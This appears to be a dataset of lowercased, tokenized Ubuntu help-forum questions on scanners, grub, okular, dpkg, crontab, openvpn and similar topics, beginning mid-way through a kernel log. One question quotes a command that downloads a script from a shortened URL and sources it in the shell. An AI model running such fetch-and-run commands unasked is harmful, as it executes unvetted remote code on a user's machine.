1-2:1.4 : ttyacm2 : usb acm device [ 74.478363 ] cdc_acm 1-2:1.6 : this device can not do calls on its own . it is not a modem . [ 74.488372 ] cdc_acm 1-2:1.6 : ttyacm3 : usb acm device [ 74.495269 ] cdc_acm 1-2:1.8 : this device can not do calls on its own . it is not a modem . [ 74.505279 ] cdc_acm 1-2:1.8 : ttyacm4 : usb acm device [ 74.510040 ] cdc_acm 1-2:1.10 : this device can not do calls on its own . it is not a modem . [ 74.520141 ] cdc_acm 1-2:1.10 : ttyacm5 : usb acm device [ 74.530090 ] cdc_acm 1-2:1.12 : this device can not do calls on its own . it is not a modem . [ 74.540283 ] cdc_acm 1-2:1.12 : ttyacm6 : usb acm device [ 74.619720 ] cdc_acm 1-2:1.0 : this device can not do calls on its own . it is not a modem . [ 74.629455 ] cdc_acm 1-2:1.0 : ttyacm0 : usb acm device [ 74.634429 ] cdc_acm 1-2:1.2 : this device can not do calls on its own . it is not a modem . [ 74.644042 ] cdc_acm 1-2:1.2 : ttyacm1 : usb acm device [ 74.649475 ] cdc_acm 1-2:1.4 : this device can not do calls on its own . it is not a modem . [ 74.659027 ] cdc_acm 1-2:1.4 : ttyacm2 : usb acm device [ 74.664459 ] cdc_acm 1-2:1.6 : this device can not do calls on its own . it is not a modem . [ 74.674133 ] cdc_acm 1-2:1.6 : ttyacm3 : usb acm device [ 74.678741 ] cdc_acm 1-2:1.8 : this device can not do calls on its own . it is not a modem . [ 74.688415 ] cdc_acm 1-2:1.8 : ttyacm4 : usb acm device [ 74.693389 ] cdc_acm 1-2:1.10 : this device can not do calls on its own . it is not a modem . [ 74.703186 ] cdc_acm 1-2:1.10 : ttyacm5 : usb acm device [ 74.708099 ] cdc_acm 1-2:1.12 : this device can not do calls on its own . it is not a modem . [ 74.717895 ] cdc_acm 1-2:1.12 : ttyacm6 : usb acm device `
515754	canon multitasking printer : scanner does n't work , printer does	model : canon prixma mg2260 i have installed to ubuntu 14.04 trusty tahr . now i have the problem by my multi function device . the printer works , but the scanner does n't ! i have downloaded the linux software of canon for the 2200 series . i have downloaded the software of the internet site of canon . 6 zip folder 3 deb . and 3 rpm . always 1 for computer , 1 for scanner , 1 for other thinks . i can load them on my pc and unpacking , but they do not install themselves . does any person know what i have to do about this ?
515757	how do i create the `` gnome-desktop-item-edit '' program 's launch icon with root privileges and more ?	i personally dont prefer running commands in terminal to achieve a task and prefer apps to execute the job . creating launcher for apps is one such command where i prefer the gnome-desktop-item-edit application for creating launchers . if the gnome package is installed , just searching `` create launcher '' opens the app . i have created launchers for windows app on wine installation using create launcher but , it doesnt serve any purpose , because for starters the application can not create launchers for various apps without root permission and the location where the apps have to be created . usually the launcher apps with root permission can be created at /usr/share/applications and without root permission at /.local/share/applications . i dont prefer the latter location as it is vulnerable to deletion . hence , in order to create the launchers through gnome with root , everytime i am forced to open this through terminal using the below command ! $ sudo gnome-desktop-item-edit ~/.local/share/applications -- create-new i dont want to open terminal everytime i want to create an application launcher on unity ! i am able to lock the `` create launcher '' app in the launcher , but not with root privileges so i want to be able to create the `` create launcher '' app shortcut on unity with default root privileges and for the app to create the launchers at usr/share/applications by default ! please help ! p.s . i dont have enough rep points to add screenshots to help with the question !
515760	certain keyboard shortcuts not working	i have the logitech k800 keyboard but ca n't seem to get certain shortcuts working . i change in the keyboard shortcut settings volume up and down and it actually takes the key assignment but does not take effect when trying to use . after trying for a while i also tried to create a custom shortcut after with the command amixer -q sset master 10 % - finally i tried changing the command to touch a file to see if it is actually responding but nothing . how can it take the key as an assignment in the shortcut settings but not to actually respond when pressing it . fyi other keys work like mute , next track etc . there is just 3 keys shortcuts not currently working . thanks
515763	name of the application to make bootable usbs from the contextual menu	what 's the name of the application to make bootable usbs from contextual menu ? i want to see if i can install it on kubuntu .
515767	base system failed	i 'm installing ubuntu on a gateway laptop , i got a error : install base system failed , target file system contains files from a past installation . these files can cause problems with the installation process , and if you proceed , some of the existing file may be overwritten . do i proceed ? help
515772	okular ca n't read pdf files	i recently have installed okular on my ubuntu 14.04 . the problem is when i open pdf files , okular gives me the error `` can not find a plugin which is able to handle the document being passed . '' when i ran okular by terminal , this is the message i get . admin @ me : ~ $ okular ex01.pdf okular ( 14100 ) /kdeui ( kiconloader ) : error : standard icon theme `` oxygen '' not found ! okular ( 14100 ) /kdeui ( kiconloader ) : error : standard icon theme `` oxygen '' not found ! okular ( 14100 ) kpixmapsequence : :private : :loadsequence : invalid pixmap specified . okular ( 14100 ) kpixmapsequence : :private : :loadsequence : invalid pixmap specified . okular ( 14100 ) kpixmapsequence : :framesize : no frame loaded okular ( 14100 ) kpixmapsequence : :private : :loadsequence : invalid pixmap specified . okular ( 14100 ) kpixmapsequence : :framesize : no frame loaded okular ( 14100 ) kpixmapsequence : :private : :loadsequence : invalid pixmap specified . okular ( 14100 ) kpixmapsequence : :framesize : no frame loaded okular ( 14100 ) kpixmapsequence : :private : :loadsequence : invalid pixmap specified . okular ( 14100 ) kpixmapsequence : :framesize : no frame loaded okular ( 14100 ) kpixmapsequence : :private : :loadsequence : invalid pixmap specified . okular ( 14100 ) kpixmapsequence : :framesize : no frame loaded okular ( 14100 ) kpixmapsequence : :private : :loadsequence : invalid pixmap specified . okular ( 14100 ) kpixmapsequence : :framesize : no frame loaded okular ( 14100 ) : no ksycoca4 database available ! okular ( 14100 ) /kdecore ( trader ) kservicetypetrader : :defaultoffers : kservicetypetrader : servicetype `` okular/generator '' not found okular ( 14100 ) /kdecore ( kconfigskeleton ) kcoreconfigskeleton : :writeconfig : okular ( 14100 ) /kdecore ( kconfigskeleton ) kcoreconfigskeleton : :writeconfig : okular ( 14100 ) /kdecore ( kconfigskeleton ) kcoreconfigskeleton : :writeconfig : okular ( 14100 ) /kdecore ( kconfigskeleton ) kcoreconfigskeleton : :writeconfig : okular ( 14100 ) /kdecore ( kconfigskeleton ) kcoreconfigskeleton : :writeconfig : okular ( 14100 ) : no ksycoca4 database available ! okular ( 14100 ) /kdecore ( trader ) mimetypesycocaserviceoffers : kmimetypetrader : mimetype `` application/pdf '' not found okular ( 14100 ) : no ksycoca4 database available ! okular ( 14100 ) /kdecore ( trader ) : kmimetypetrader : could n't find service type `` okular/generator '' please ensure that the .desktop file for it is installed ; then run kbuildsycoca4 . okular ( 14100 ) /okular ( app ) okular : :document : :opendocument : no plugin for mimetype ' '' application/pdf '' ' . okular ( 14100 ) : could n't start knotify from knotify4.desktop : `` klauncher could not be reached via d-bus . error when calling start_service_by_desktop_path : the name org.kde.klauncher was not provided by any .service files '' okular ( 14100 ) /kdeui ( knotification ) knotification : :slotreceivediderror : error while contacting notify daemon `` the name org.kde.knotify was not provided by any .service files '' x error : badwindow ( invalid window parameter ) 3 major opcode : 20 ( x_getproperty ) resource id : 0x2a0002e okular ( 14110 ) kpixmapsequence : :private : :loadsequence : invalid pixmap specified . okular ( 14110 ) kpixmapsequence : :framesize : no frame loaded okular ( 14110 ) kpixmapsequence : :private : :loadsequence : invalid pixmap specified . okular ( 14110 ) kpixmapsequence : :framesize : no frame loaded okular ( 14110 ) kpixmapsequence : :private : :loadsequence : invalid pixmap specified . okular ( 14110 ) kpixmapsequence : :framesize : no frame loaded x error : badwindow ( invalid window parameter ) 3 major opcode : 20 ( x_getproperty ) resource id : 0x2a0001d x error : badwindow ( invalid window parameter ) 3 major opcode : 20 ( x_getproperty ) resource id : 0x2a0001d i would be much appreciated for any suggestion to solve this problem . thanks a lot : )
515773	dpkg error when using apt-get install	i upgraded to ubuntu 14.04 from 12.04 and every time i use apt-get install for any package it ends with a bunch of errors about processing some of my latex packages . including a snippet below : sometimes , not accepting conffile updates in /etc/texmf/updmap.d causes updmap-sys to fail . please check for files with extension .dpkg-dist or .ucf-dist in this directory dpkg : error processing package tex-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of lmodern : lmodern depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . reproduced by using sudo dpkg -- configure -a and a total list of packages with this error is included here : errors were encountered while processing : tex-common texlive-publishers tex-gyre texlive-latex-extra-doc texlive-fonts-extra-doc texlive-lang-english texlive-luatex texlive-generic-recommended texlive-pstricks-doc texlive-fonts-recommended latex2html latex-xcolor texlive-pictures texlive-fonts-extra texlive-pictures-doc asymptote texlive-bibtex-extra texlive-latex-recommended-doc texlive-latex-recommended doxygen-latex texlive-pstricks tipa texlive-latex-base texlive-fonts-recommended-doc latex-beamer texlive-font-utils texlive-latex-base-doc texlive-latex-extra texlive-extra-utils texlive texlive-publishers-doc lmodern any ideas on how to fix this ? edit 1 : adding the result of trying sudo apt-get install -f : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 32 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up tex-common ( 4.04 ) ... ignoring /etc/texmf/texmf.d/05texmf.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/15plain.cnf during generation of texmf.cnf , please remove manually ! ignoring /etc/texmf/texmf.d/80dvipdfmx.cnf during generation of texmf.cnf , please remove manually ! running mktexlsr . this may take some time ... done . running updmap-sys . this may take some time ... updmap-sys failed . output has been stored in /tmp/updmap.djoqcw7n
515777	how can i make a link that ntfs supports ?	when i make a link so that someone can access a file over the network directly , and then copy it across , i get the following error : there was an error copying the file into smb : //ostrich/users/public/website . symlinks not supported by backend i know this is because ntfs uses different links ( the mklink command as opposed to the ln command ) , but how can i make a link for ntfs - can you use mklink on ubuntu ?
515780	how to run hobostove on ubuntu	i just found this terminal client for campfire , but it does n't say too much about how this ( if possible ) could be run on ubuntu instead of osx . https : //github.com/smartlogic/hobostove how would i go about runnning this in ubuntu 14.04 lts ?
515783	synaptics driver not workin with new kernel ?	after i upgraded from kernel 3.13.0-29 my synaptics driver seems to stopped working . basic touchpad functions still work ( this includes moving cursor and clicking ) but no right click nor middle click emulation neither scrolling works . synclient -l gives error : could n't find synaptics properties . no synaptics driver loaded ? $ xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 synaptics touchpad id=12 [ slave pointer ( 2 ) ] ⎜ ↳ usb optical mouse id=14 [ slave pointer ( 2 ) ] also xinput list-props 12 device 'ps/2 synaptics touchpad ' : device enabled ( 142 ) : 1 coordinate transformation matrix ( 144 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 265 ) : 0 device accel constant deceleration ( 266 ) : 1.000000 device accel adaptive deceleration ( 267 ) : 1.000000 device accel velocity scaling ( 268 ) : 10.000000 device product id ( 261 ) : 2 , 1 device node ( 262 ) : `` /dev/input/event4 '' evdev axis inversion ( 269 ) : 0 , 0 evdev axes swap ( 271 ) : 0 axis labels ( 272 ) : `` rel x '' ( 152 ) , `` rel y '' ( 153 ) button labels ( 273 ) : `` button left '' ( 145 ) , `` button middle '' ( 146 ) , `` button right '' ( 147 ) , `` button wheel up '' ( 148 ) , `` button wheel down '' ( 149 ) evdev middle button emulation ( 274 ) : 0 evdev middle button timeout ( 275 ) : 50 evdev third button emulation ( 276 ) : 0 evdev third button emulation timeout ( 277 ) : 1000 evdev third button emulation button ( 278 ) : 3 evdev third button emulation threshold ( 279 ) : 20 evdev wheel emulation ( 280 ) : 0 evdev wheel emulation axes ( 281 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 282 ) : 10 evdev wheel emulation timeout ( 283 ) : 200 evdev wheel emulation button ( 284 ) : 4 evdev drag lock buttons ( 285 ) : 0 so everything looks normal . on the other hand cat /var/log/xorg.0.log | grep syna gives nothing , but cat /var/log/xorg.0.log | grep syn gives reasonable output : [ 29.173 ] ( ii ) config/udev : adding input device ps/2 synaptics touchpad ( /dev/input/event4 ) [ 29.173 ] ( ** ) ps/2 synaptics touchpad : applying inputclass `` evdev pointer catchall '' [ 29.173 ] ( ii ) using input driver 'evdev ' for 'ps/2 synaptics touchpad' [ 29.173 ] ( ** ) ps/2 synaptics touchpad : always reports core events [ 29.173 ] ( ** ) evdev : ps/2 synaptics touchpad : device : `` /dev/input/event4 '' [ 29.173 ] ( -- ) evdev : ps/2 synaptics touchpad : vendor 0x2 product 0x1 [ 29.173 ] ( -- ) evdev : ps/2 synaptics touchpad : found 3 mouse buttons [ 29.173 ] ( -- ) evdev : ps/2 synaptics touchpad : found relative axes [ 29.173 ] ( -- ) evdev : ps/2 synaptics touchpad : found x and y relative axes [ 29.173 ] ( ii ) evdev : ps/2 synaptics touchpad : configuring as mouse [ 29.173 ] ( ** ) evdev : ps/2 synaptics touchpad : yaxismapping : buttons 4 and 5 [ 29.173 ] ( ** ) evdev : ps/2 synaptics touchpad : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 29.173 ] ( ii ) xinput : adding extended input device `` ps/2 synaptics touchpad '' ( type : mouse , id 12 ) [ 29.173 ] ( ii ) evdev : ps/2 synaptics touchpad : initialized for relative axes . [ 29.173 ] ( ** ) ps/2 synaptics touchpad : ( accel ) keeping acceleration scheme 1 [ 29.173 ] ( ** ) ps/2 synaptics touchpad : ( accel ) acceleration profile 0 [ 29.173 ] ( ** ) ps/2 synaptics touchpad : ( accel ) acceleration factor : 2.000 [ 29.173 ] ( ** ) ps/2 synaptics touchpad : ( accel ) acceleration threshold : 4 [ 29.173 ] ( ii ) config/udev : adding input device ps/2 synaptics touchpad ( /dev/input/mouse0 ) i have tried adding entry to /etc/x11/xorg.conf but it did not work . when i boot using kernel 3.13.0-29 everything works . with any newer kernel - problems . any idea on how to fix/debug it ? cheers !
515784	file operation window can not be restored	after i minimised a file operations window showing me the progress of copying a 100 gb file , i can not restore it in any way . i tried the proposed solutions from when copying files and the focus is changed the file copy status window is no longer available as well as from how to restore file copy / transfer status window ? , but none seem to work . ticking `` show copy dialog '' /alt + tab/alt + ~/alt + mousewheel etc . change nothing . any ideas ? this is getting quite frustrating .
515788	upstart : wait for webping	i 'm using upstart to start my server , but i would like the start process to wait for the localhost : port/webping to be available ( 200 ok ) before considering the startup successful , so the automatic deploys ( triggered by a git hook ) could have immediate feedback on the success or not of the deploy . how can i do so with upstart ? this is my current script : start on ( local-filesystems and net-device-up iface ! =lo ) respawn chdir app_path env lein_root=yes exec lein ring server-headless > /log_path.log 2 > & 1
515789	how to update jemalloc latest version ?	how can i check jemalloc version in my pc and if i want to upgrade to the latest jemalloc version how should i do ?
515791	problem using scanner on my multifunction samsung sl-m2070 in ubuntu 14.04	printer works ok , but ubuntu can not find scanner , i have installed driver but ubuntu still can not find the scanner . in 12.04 the problem did not occur ! what do i do wrong ? and i wonder is there any scanner on the market that works on ubuntu 14.04 ?
515792	google chrome install problem	my computer is a lenovo ideapad u410 touch with ubuntu 14.04 lts . i want to install chrome . when i tried to install google chrome i was asked what download package to choose : 32 bit deb ( for debian/ubuntu ) 64 bit deb ( for debian/ubuntu ) 32 bit rpm ( for fedora/opensuse ) 64 bit rpm ( for fedora/opensuse ) so what should i choose ?
515796	best direct folder sync software	i need to sync my folders on linux pc and sometimes windows . i do n't need cloud sync ( uploading file on cloud ) , i wa n't to find direct synchronization like peer to peer . i am going to sync several folders . please suggest something with gui . thx in advance .
515800	how to create a right-click keyboard shortcut ?	is there any shortcut to have the same effect as the right click of the mouse as i do n't have the menu button on my laptop if not , is there any alternative way such that i can make it possible i am using ubuntu-gnome14.04
515803	how do i make a custom uefi bootable live cd ?	i tried the following from : linuxquestions.org . mkisofs -u -j -joliet-long -r -v -t -o ttylinux.iso -b boot/isolinux/isolinux.bin -c boot/isolinux/boot.cat \ -no-emul-boot -boot-load-size 4 -boot-info-table -eltorito-alt-boot -e efiboot.img -no-emul-boot . and ../grub-mkimage -o x86_64-efi -d . -o bootx64.efi -p `` /efi/boot '' part_gpt part_msdos fat ext2 normal chain boot \ but i ca n't find efiboot.img or bootx64.efi in my system ( find -name or via apt-cache search ) . i am running ubuntu 14.04 trusty tahr . how can i make a customized uefi bootable live cd ? source : make uefi bootable live cd - linuxquestions.org uefibooting - community help wiki uefi - community help wiki
515806	want to disable internet but want to agree for browser	i want to disable all other services that are using the ip except of web browser . is there a good software ? i am on ubuntu 14.04
515809	unity launcher `` application start '' feedback in custom theme	when i start application in unity , the application launcher icon blinks informing me that something is happening . that 's a behaviour in default unity theme . however , in theme i use ( moka ) such functionality is turned off and looks like this : http : //i.imgur.com/vslfxot.png there is no feedback from unity that application is starting . is there any way to bring it back without screwing up this theme ?
515811	how do i dual boot ubuntu 14.04 with windows 7 ?	i am running ubuntu 14.04 , and i am wishing to duel boot windows 7 . i have my boot order to automatically boot from usb . i have an iso of windows 7 but no way to `` burn '' them to usb . i 've tried getting unetbootin , winusb , and yumi on my system but they all have problems . any help would be nice .
515815	creating a nodejs chat application	i am creating a nodejs chat application , and i am in the process of setting up the environment . my os is ubuntu 14.04 . i could understand that i need nodejs and socket.io to be installed on my pc before creating the application . how can i install these packages : nodejs and socket.io on my system , so that i can start building my chat application ?
515816	problem with gimp when instaling scangearmp on ubuntu 14.04	i get the following message when installing scangermp on ubuntu , i run the command ./autogen.sh and then i get : checking for gimp ... no configure : error : package requirements ( gimp-2.0 > = 2.0.0 ) were not met : no package 'gimp-2.0 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables gimp_cflags and gimp_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . gimp is installed . but i do n't find gimp2 thank for any help on this matter .
515817	files writable under /proc , what 's the purpose ?	while exploring /proc directory in root , i find some files are writable , as /proc is pseudo file system , so every time system gets boot , this will come in existence and will be deleted ( ie no physical existence on disk of files stored under /proc ) while shutting down . some files which are writable under /proc : `` latency '' , `` mtrr '' some kind of registers are there , `` timer_stats '' , `` sysrq-trigger '' . i know this files can be used to alter system performance or say to tune system on run-time . here i 'm requesting , if anyone can explain me significance of this files for tuning system using this files . what affect to system performance or tuning can be done by altering these files ? ? note : i have already asked this question on super user , but i could't find any satisfactory answer . so please do n't tag as duplicate . i am just looking for perfect answer that can satisfy my curiosity or may be someone else 's too .
515818	crontab command does not function properly	i have the following crontab entry to automate copying of my files to separate w/s in the network . however , it does not copy the files but produce the log file . here is the file contents # ! /bin/bash echo `` rsync - ma inbound files '' rsync -rvu /media/hdd2/ma-inbound /media/miracle/ echo `` completed ma inbound files sync , starting tally.erp 9 data file sync '' rsync -rvu /media/hdd2/tally.erp9 /media/miracle/ echo `` completd tally.erp9 data file sync , starting 2011 accounts files sync '' rsync -rvu /media/hdd2/ '' 2011 accounts '' /media/miracle/ echo `` completd 2011 accounts files sync , starting 2012 accounts files sync '' rsync -rvu /media/hdd2/ '' 2012 accounts '' /media/miracle/ echo `` completd 2012 accounts files sync , starting 2012 files sync '' rsync -rvu /media/hdd2/ '' 2012 files '' /media/miracle/ echo `` completd 2012 files sync , starting 2013 accounts files sync '' rsync -rvu /media/hdd2/ '' 2013 accounts '' /media/miracle/ echo `` completd 2013 accounts , starting admin files sync '' rsync -rvu /media/hdd2/ '' admin '' /media/miracle/ echo `` completd admin files sync , starting ma_staff data file sync '' rsync -rvu /media/hdd2/ma_staff /media/miracle/ echo `` completd ma_staff data file sync , starting ma-outbound data file sync '' rsync -rvu /media/hdd2/ma_outbound /media/miracle/ echo `` completd ma-outbound data file sync , starting staff pic data file sync '' rsync -rvu /media/hdd2/ '' staff pic '' /media/miracle/ echo `` completd staff pic data file sync , end of syn '' here is the command which i have put in the crontab file 30 22 * * * /desktop/marsync.sh > autorsynclogfile.txt when i copy these commands individually , it works flawlessly hope some one can help me out wit this ... .. thank you
515819	no internet via wifi/ethernet after 14.04 upgrade	i have just updated to ubuntu 14.04 lts on my laptop , and i seem to be having some internet problems . i have no internet connection through wifi or ethernet , after both working in the previous version . i am not at all knowledgeable of ubuntu and its workings , so if you could just tell me what to do , what to show you by just telling me commands etc . i think would be the only way i will understand sorry ! i am asking this after many searches , all being in vein after needing a step involving some sort of internet access , which i ca n't get ! so sorry if it has been answered somewhere , if so , please send me there ! cheers this is what i get when using sudo lspci -v : lspci -v
515821	how to resolve screen flickering in xubuntu 14.04 ?	i have been using xubuntu 14.04 alongside windows xp . today all of a sudden while surfing the internet the screen started flickering . i restarted the computer , it ran successfully but the same issue came up . this time there where continuous beep sounds from the cpu . please help . specs : intel pentium d 3.00ghz 2gb ram gigabyte g41-m combo xubuntu 14.04 lts & windows xp screenshot - http : //imgur.com/tizeo2v
515823	how do i access the files at my ubuntu desktop from windows os ?	sometimes , i need to access my files on my desktop in ubuntu ( /home/abhimanyu ) . although i can access my windows files from the ubuntu , i do n't seem to be able to access my ubuntu files when i run windows . so how do i access my files on desktop in ubuntu via windows ? or what is the path of those directories ? clarifications i run windows xp and ubuntu 13.10 . i installed ubuntu via windows ( so maybe i ca n't ? ) .
515826	if i use & & to run two commands - do i need to put sudo in once or twice ?	suppose i have the following command curl -lo .amb j.mp/docker-ambari & & . .amb & & amb-deploy-cluster ( assuming this is running on vagrant - so not a real machine ) and i know i 've got a permission issue and want to add sudo - do i need to add it once : sudo curl -lo .amb j.mp/docker-ambari & & . .amb & & amb-deploy-cluster or more ? sudo curl -lo .amb j.mp/docker-ambari & & sudo . .amb & & sudo amb-deploy-cluster
515827	how to turn off window refreshing during resizing	i have noticed that ever since upgrade to 14.04 , when working with r , resizing a window triggers thousands of redrawing requests . this is able to kill off my session completely if the redrawing takes much time , as is the case with many complex statistical plots . is it possible to resize windows in current unity using a wireframe only ?
515830	grub problems after upgrading ubuntu from 12.04 - > 14.04.1	recently i have upgraded my ubuntu pc from 12.04 lts to 14.04.1 . after the first reboot , i was able to boot into rescue mode only ( found similar problem here : error : file '/grub/i386-pc/normal.mod ' not found ) . i have upgraded the grub using sudo grub-install /dev/sda -- root-directory=/mnt and now i have the following problem : i see the grub menu , but the default entry is not working , and gave 2 errors '' file not found '' and '' you need to load kernel first '' but if i go to advanced options - i see a long list of kernel versions to choose . when i choose `` linux-image-3.11.0-15-generic '' - it starts to boot . why is the latest `` linux-image-3.13 '' is not loading ? how can i repair it ? and how to detect and remove all unused entries from the grub menu ?
515833	working cds / dvds does not work on my ubuntu 14.04 !	i just noticed that if i insert a dvd , the drive will start spinning but it will not show the mounted disc . if insert a cd , it is mounted , but in some cases it says it is empty cd , but it is not ! for cds it used to ask me what to do with the media inserted . but for dvds , it does n't even do that ( also there is some exceptions about dvds ) . i ran the following commands in terminal : $ eject -n eject : device is `/dev/sr0' $ eject *works properly* $ sudo mount -o ro , unhide , uid=1000 /dev/cdrom /mnt mount : special device /dev/cdrom does not exist $ sudo mount -o ro , unhide , uid=1000 /dev/sr0 /mnt mount : /dev/sr0 already mounted or /mnt busy $ sudo ls -la /mnt total 8 drwxr-xr-x 2 root root 4096 apr 19 2013 . drwxr-xr-x 25 root root 4096 aug 17 08:57 .. what can i do to get the functionality back on my drive ? i am running ubuntu 14.04 . following are some commands and their results : $ dmesg | tail [ 92423.122683 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 92423.122685 ] read ( 10 ) : 28 00 00 00 00 00 00 00 01 00 [ 92423.129168 ] sr 1:0:0:0 : [ sr0 ] [ 92423.129177 ] result : hostbyte=did_ok driverbyte=driver_sense [ 92423.129181 ] sr 1:0:0:0 : [ sr0 ] [ 92423.129185 ] sense key : illegal request [ current ] [ 92423.129191 ] sr 1:0:0:0 : [ sr0 ] [ 92423.129198 ] add . sense : illegal mode for this track [ 92423.129203 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 92423.129205 ] read ( 10 ) : 28 00 00 00 00 00 00 00 01 00 $ dmesg | grep -a1 cd-rom [ 1.996357 ] scsi 1:0:0:0 : cd-rom tsstcorp dvd+-rw ts-l633c dw60 pq : 0 ansi : 5 [ 2.003977 ] sr0 : scsi3-mmc drive : 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray [ 2.003984 ] cdrom : uniform cd-rom driver revision : 3.20 [ 2.004234 ] sr 1:0:0:0 : attached scsi cd-rom sr0 [ 2.004329 ] sr 1:0:0:0 : attached scsi generic sg1 type 5 after i successfully inserted a working ( audio ) cd : $ udevadm monitor * ( before insertion ) * monitor will print the received events for : udev - the event which udev sends out after rule processing kernel - the kernel uevent kernel [ 95316.956977 ] change /devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sr0 ( block ) udev [ 95317.141828 ] change /devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sr0 ( block ) $ udevadm monitor * ( after eject ) * kernel [ 95432.873954 ] change /devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sr0 ( block ) udev [ 95432.987496 ] change /devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sr0 ( block ) after i successfully inserted a not-empty data cd ( which ubuntu displays it as empty cd ) : $ udevadm monitor * ( before insertion ) * monitor will print the received events for : udev - the event which udev sends out after rule processing kernel - the kernel uevent kernel [ 95513.713933 ] change /devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sr0 ( block ) udev [ 95513.820539 ] change /devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sr0 ( block ) $ udevadm monitor * ( after eject ) * kernel [ 95611.480163 ] change /devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sr0 ( block ) udev [ 95611.597923 ] change /devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sr0 ( block ) after i successfully inserted a not-empty data dvd ( which is not mountable ! ) : $ udevadm monitor * ( before insertion ) * monitor will print the received events for : udev - the event which udev sends out after rule processing kernel - the kernel uevent $ udevadm monitor * ( after eject ) * after i successfully inserted another not-empty data dvd ( which is mountable and working ! ) : $ udevadm monitor * ( before insertion ) * kernel [ 95778.780954 ] change /devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sr0 ( block ) udev [ 95784.946087 ] change /devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sr0 ( block ) kernel [ 95785.256835 ] add /module/crc_itu_t ( module ) udev [ 95785.257269 ] add /module/crc_itu_t ( module ) kernel [ 95785.318459 ] add /module/udf ( module ) kernel [ 95785.318809 ] add /kernel/slab/udf_inode_cache ( slab ) udev [ 95785.319442 ] add /module/udf ( module ) udev [ 95785.319871 ] add /kernel/slab/udf_inode_cache ( slab ) kernel [ 95785.469911 ] add /module/nls_utf8 ( module ) udev [ 95785.470400 ] add /module/nls_utf8 ( module ) $ udevadm monitor * ( after eject ) * kernel [ 96112.878488 ] change /devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sr0 ( block ) udev [ 96113.029830 ] change /devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sr0 ( block )
515834	unable to install bsddb185 , python library for opening berkeley db version 1.85 files on ubuntu	i am writing a python program that makes use of some legacy berkeley db 1.85 files . unfortunately i am unable to install the bsddb185 python package , either for python version 2.x and for python 3 . what i got , using pip , is the following error message : root @ ubuntu : ~ # pip install bsddb185 downloading/unpacking bsddb185 downloading bsddb185-1.0.tar.gz running setup.py ( path : /tmp/pip_build_root/bsddb185/setup.py ) egg_info for package bsddb185 did n't find db.h with hashversion == 2 cleaning up ... no files/directories in /tmp/pip_build_root/bsddb185/pip-egg-info ( from pkg-info ) storing debug log for failure in /home/stab/.pip/pip.log it appears that i am missing the db.h file which should have the constant hashversion set at value 2 . i tried to install several ubuntu packages that include db.h , such as libdb5.3-dev and libdb6.0-dev , getting the same error . after realizing that i need a specific version for opening my files , i discovered that a package i need was actually included in a debian distribution , but it does not exist anymore under ubuntu . i also tried to open the database using bsddb3 's hashopen function , but i suspect that the given format is not the one bsddb3 is expecting : ... file `` ./read_db.py '' , line 9 , in open_db f = db.hashopen ( filename ) file `` /usr/lib/python2.7/dist-packages/bsddb3/__init__.py '' , line 347 , in hashopen d.open ( file , db.db_hash , flags , mode ) bsddb3.db.dbinvalidargerror : ( 22 , 'invalid argument -- bdb0210 ././entries.db : metadata page checksum error ' ) the ubuntu package libdb1-compat does contain tools that read from 1.85 format , but it does not contain any db.h header that i might use for compiling the python library bsddb185 . how would you solve this problem ? i am short on ideas right now .
515835	how to test web applications for mobile devices on ubuntu ?	is there any program like xcode i can use on ubuntu to test web applications for iphones and ios ? i have ubuntu 14.04 .
515841	can i contribute my compiled software to the repos	so far i have seen many packages in the ubuntu repository ( e.g . eclipse ) which are old , so i have to compile and install it manually . so i wondered if i could contribute to ubuntu and help to update some packages so not everybody has to manually install them ? it may sound a bit naive but somebody has to do that , right ? ! i am willing to learn if it is more complicated !
515842	is there something similar to `` open with '' in nautilus for midnight commander ?	i want to have choose among software when i press enter button in midnight commander ( mc ) . for example , sometimes i open txt files with gedit or gvim . html files i can open with firefox or with gvim .
515845	data not routing through openvpn in linux	i am using openvpn services provided by vpnbook.com it runs properly but data is not being routed through it . i mean if i change my browser settings after running openvpn it shows nothing . also i am unable to download any package through it . in short i can not communicate with this or any openvpn . do i need to change anything in my network settings ?
